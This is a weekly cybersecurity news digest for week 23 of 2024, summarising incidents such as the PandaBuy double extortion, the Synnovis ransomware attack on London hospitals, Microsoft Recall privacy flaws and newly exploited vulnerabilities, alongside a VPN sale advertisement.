InfoSec MASHUP - Week 23/2024
Malware can steal data recorded by MS Recall; Tom Cruise's voice used in deepfake; PandaBuy paid ransom, twice; London hospitals revert to paper records after attack;
Partners and Affiliates
🔐 NordVPN’s Spring Sale Campaign (May 2 - Jun 12)
Special offer update:
🇺🇸 USA & 🇸🇪 Sweden: up to 74% off + 3 months extra
🇬🇧 UK, 🇩🇪 Germany, 🇳🇱 Netherlands, 🇮🇹 Italy, 🇫🇷 France: up to 73% off + 3 months extra
🌍 Rest: up to 75% off + 3 months extra
Breaches & Security Incidents
🔓 🇨🇳 Chinese shopping platform Pandabuy paid a ransom to prevent the leak of stolen data, but the same threat actor extorted the company again. The data breach, which exposed customer information, was caused by critical vulnerabilities in the PandaBuy API. The company confirmed paying the hacker but stated that they would no longer cooperate with him. Users are advised to reset their passwords and be cautious of unsolicited messages claiming to be from Pandabuy.
🔓 🇺🇸 Threat actors have stolen 3TB of data from Advance Auto Parts after breaching the company's Snowflake account. The stolen data includes customer profiles, customer orders, loyalty/gas card numbers, auto parts information, sales history, employment candidate info, and transaction tender details. The data is being sold online for $1.5 million. Advance Auto Parts has not publicly disclosed the breach or notified the U.S. Securities and Exchange Commission. Snowflake, the cloud storage company, has been targeted in recent attacks, with other companies like Santander and Ticketmaster also being affected.
🔓 🇦🇺 Australian mining company Northern Minerals fell victim to a data breach after a ransomware group leaked information stolen from the company. The leaked data includes operational, financial, and personal information, as well as corporate email archives. The breach, discovered in March 2024, has not had a material impact on the company's operations. It is unclear whether the company engaged in communication with the hackers, but the fact that the data was made public suggests that no ransom was paid.
🇬🇧 🏥 A ransomware attack on Synnovis, a pathology and diagnostic services provider, has disrupted healthcare services at several major NHS hospitals in London. The affected hospitals, including Guy's and St Thomas' and King's College, are experiencing significant impacts, especially in blood transfusions. Some services have been canceled or redirected. The NHS is working with the National Cyber Security Centre to assess the situation. Synnovis, previously known as Viapath, experienced data center issues rendering systems inaccessible.
➝ Qilin ransomware gang linked to attack on London hospitals
➝ London NHS hospitals revert to paper records after cyber-attack
🔓 A massive trove of 361 million email addresses from stolen credentials has been added to the Have I Been Pwned data breach notification service. These credentials were collected from Telegram cybercrime channels and include username and password combinations, along with associated URLs. The data is used for credential stuffing attacks, password-stealing malware, and data breaches.
🔓 🤗 Hugging Face detected unauthorized access to its Spaces platform, potentially exposing a subset of Spaces' secrets. The company has revoked compromised tokens, advised users to refresh keys or tokens, and called in external forensics experts. They have also made security improvements and plan to deprecate "classic" tokens in the future. This incident follows the discovery of exposed Hugging Face API tokens in 2023, highlighting the importance of AI security.
Cybercrime, Cyber Espionage, APT’s
🇺🇸 💰 US authorities have filed a civil forfeiture action to recover over $5.3 million lost by a Massachusetts workers union in a business email compromise (BEC) scam. The union fell victim to a spoofed email and transferred the money to a fraudulent account. Authorities have seized the funds in several bank accounts and are seeking forfeiture. BEC schemes continue to pose a serious threat, with losses reaching a record $12.5 billion in 2023.
🇨🇳 👀 Chinese state-sponsored actors have teamed up in a cyber espionage campaign known as Crimson Palace, targeting a government agency in Southeast Asia since at least March 2022. The campaign involves new malware variants and three activity clusters, indicating a coordinated attack. The clusters, named Alpha, Bravo, and Charlie, have different objectives such as disrupting network communications, lateral movement and persistence, and extensive reconnaissance. The activity is believed to be centrally coordinated under a single organization. The campaign demonstrates a high level of coordination and is aimed at furthering Chinese state interests. Sophos continues to monitor the intrusion activity in the target network.
🇺🇸 🔐 The FBI has obtained over 7,000 LockBit ransomware decryption keys and is urging victims to contact them for assistance. Victims can fill out a form on the FBI's Internet Crime Complaint Center (IC3) website or use a decryptor developed by Japanese police. The LockBit ransomware has been used in over 2,400 attacks worldwide, causing billions of dollars in damages. The alleged mastermind of the operation has been charged and a $10 million reward has been offered for information on LockBit leaders.
🇪🇸 📺 Spanish police have dismantled an illegal media content distribution network that generated over $5.7 million in revenue since 2015. The network operated two websites hosting the illegal IPTV service 'TVMucho,' providing illegal access to 130 international TV channels and films. Eight individuals were arrested, and servers supporting 16 illegal streaming sites were taken offline. Subscribers' information is now in the hands of the police, potentially leading to fines for accessing illegal streaming services.
Government, Politics, and Privacy
💻 👀 Microsoft's new Recall feature in Windows 11 raises concerns about security and privacy: Recall records everything a user does on their PC, including sensitive information, without redacting it. The implementation of Recall has serious flaws, making it easy for unauthorized users to access and view the recorded data. The default settings of Recall capture a large amount of user data, and the minimal safeguards in place are not sufficient to protect it. Given Microsoft's track record with security and privacy issues, there is a lack of trust in the company's ability to keep the collected data private. Improvements to Recall's security and privacy measures are necessary before its general release.
🇪🇺 👀 Microsoft is facing privacy complaints in the European Union over the use of its Microsoft 365 Education suite in schools. Privacy rights non-profit noyb has lodged two complaints with Austria's data protection authority, focusing on transparency and legal basis issues, as well as secret tracking of children. The complaints argue that Microsoft is evading its legal responsibilities by shifting compliance onto schools and not providing clear information about data processing. The General Data Protection Regulation (GDPR) sets high expectations for the protection of children's data, and confirmed breaches can result in significant fines.
Malware & Threats
🦠 🇺🇦 CERT-UA has reported a cyberattack campaign named "SickSync" by the UAC-0020 (Vermin) hacking group, targeting Ukrainian defense forces. Linked to the Luhansk People's Republic and aligned with Russian interests, Vermin uses phishing emails with a RARSFX archive that deploys SyncThing and SPECTR malware. SyncThing facilitates peer-to-peer data theft, while SPECTR steals files, screenshots, USB data, and authentication information from browsers and messengers. The use of legitimate software helps evade detection. CERT-UA advises that any interaction with SyncThing’s infrastructure indicates a potential system compromise, warranting immediate investigation.
🦠 🗒️ Cybercriminals have launched a sophisticated cyber attack in Ukraine using an MS Excel macro to deploy Cobalt Strike and gain control of compromised hosts. The attack involves a multi-stage malware strategy, evasion techniques, and location-based checks to ensure successful payload delivery. The attackers utilize encoded strings, DLL files, and a DLL injector to facilitate persistence and evade detection.
🦠 🐍 Hackers targeted Python developers with a fake package called "crytic-compilers" on the Python Package Index (PyPI), which delivered an information stealer called Lumma. The rogue package was downloaded 441 times before being taken down. This incident highlights the trend of threat actors targeting open-source registries for distributing malware.
🦠 📷 Researchers have demonstrated how malware can steal data collected by Microsoft's Recall feature, which takes screenshots at regular intervals to capture user activities. Concerns have been raised about potential privacy issues and the intrusiveness of the feature. Researchers have shown that a remote desktop manager password collected by Recall can easily be recovered from a local unencrypted SQLite database, making it vulnerable to information-stealing malware. Microsoft claims that physical access and valid credentials are required to obtain the collected data, but researchers have proven otherwise.
🦠 💻 Fake browser updates are being used to distribute BitRAT and Lumma Stealer malware: These malicious updates redirect users to a bogus browser update page, where they are prompted to download a ZIP archive file containing JavaScript files that trigger the execution of PowerShell scripts. The scripts retrieve additional payloads, including BitRAT and Lumma Stealer, from a remote server. BitRAT allows attackers to harvest data and mine cryptocurrency, while Lumma Stealer captures information from web browsers and crypto wallets. These attacks demonstrate the ability of threat actors to leverage trusted names to maximize impact.
AI, Tech & Tools
🎙️ In this episode of Darknet Diaries, Joseph Cox (https://x.com/josephfcox) tells us the story of ANOM. A secure phone made by criminals, for criminals.
🇷🇺 🎙️ Russian agents have deployed an AI-produced deep fake of Tom Cruise's voice to narrate a fake documentary called "Olympics Have Fallen" that criticizes the International Olympic Committee (IOC). The documentary, which falsely claimed to have received positive reviews from reputable sources, was part of a larger influence operation by the Russian government to discredit the IOC and discourage participation in the Paris Olympics. Other tactics used in the operation include spreading fake videos and press releases, impersonating media outlets, and creating disinformation websites. Microsoft has attributed the majority of this activity to two Russian groups known as Storm-1679 and Storm-1099.
Vulnerabilities, Research, and Threat Intelligence
Cisco Patches Webex Bugs Following Exposure of German Government Meetings
Progress Patches Critical Vulnerability in Telerik Report Server
TikTok fixes zero-day bug used to hijack high-profile accounts
Zyxel Releases Patches for Firmware Vulnerabilities in EoL NAS Models
⚠️ 💥 Akamai has warned of fresh attacks exploiting two remote code execution (RCE) vulnerabilities in ThinkPHP, patched over five years ago. The flaws, CVE-2018-20062 and CVE-2019-9082, affect older versions of the ThinkPHP framework. Recent attack campaigns, one from October 2023 and another ongoing since April 2024, involve a Chinese-speaking threat actor using these vulnerabilities to deploy the Dama web shell, allowing extensive control over compromised servers. This includes navigating the file system, tampering with files, network port scanning, database access, and privilege escalation. Despite patches being available since 2018 and 2019, continued exploitation underscores the need for urgent updates to the latest ThinkPHP version.
🐛 The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a security flaw in Oracle WebLogic Server to the Known Exploited Vulnerabilities catalog, citing evidence of active exploitation. Tracked as CVE-2017-3506, the vulnerability allows for OS command injection, enabling unauthorized access and complete control. The China-based cryptojacking group known as the 8220 Gang has a history of leveraging this vulnerability to create a crypto-mining botnet. Federal agencies are advised to apply the latest fixes by June 24, 2024, to protect against potential threats.